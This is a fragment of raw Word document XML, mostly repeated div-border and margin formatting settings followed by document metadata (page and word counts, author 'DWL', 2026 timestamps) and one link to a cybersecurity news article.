            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1200245247">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="5310"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="867834596">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="993794806">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1301419596">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="499463644">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="4" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="174988015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557203433">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="738132475">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="120"/>
          <w:marTop w:val="72"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1896887441">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="550924056">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="677930823">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1100446175">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1661228327">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="446310875">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="985941040">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="714699844">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="5310"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="780733612">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1081414476">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1171681240">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="781193759">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="4" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="163436766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2016884480">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="263153934">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="120"/>
          <w:marTop w:val="72"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1483346049">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="258415058">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="811944417">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="784346964">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1662394214">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1698575893">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1515727429">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1005858564">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="5310"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="769855512">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2089882807">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="738985090">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="607739071">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="4" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="193116108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984821377">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="531069542">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="120"/>
          <w:marTop w:val="72"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1331101959">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="808784345">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="24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bleepingcomputer.com/news/security/the-biggest-cybersecurity-and-cyberattack-stories-of-2025/"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414</Pages>
  <Words>316857</Words>
  <Characters>1806090</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>15050</Lines>
  <Paragraphs>4237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2118710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DWL</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>DWL</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-10T10:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-10T10:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>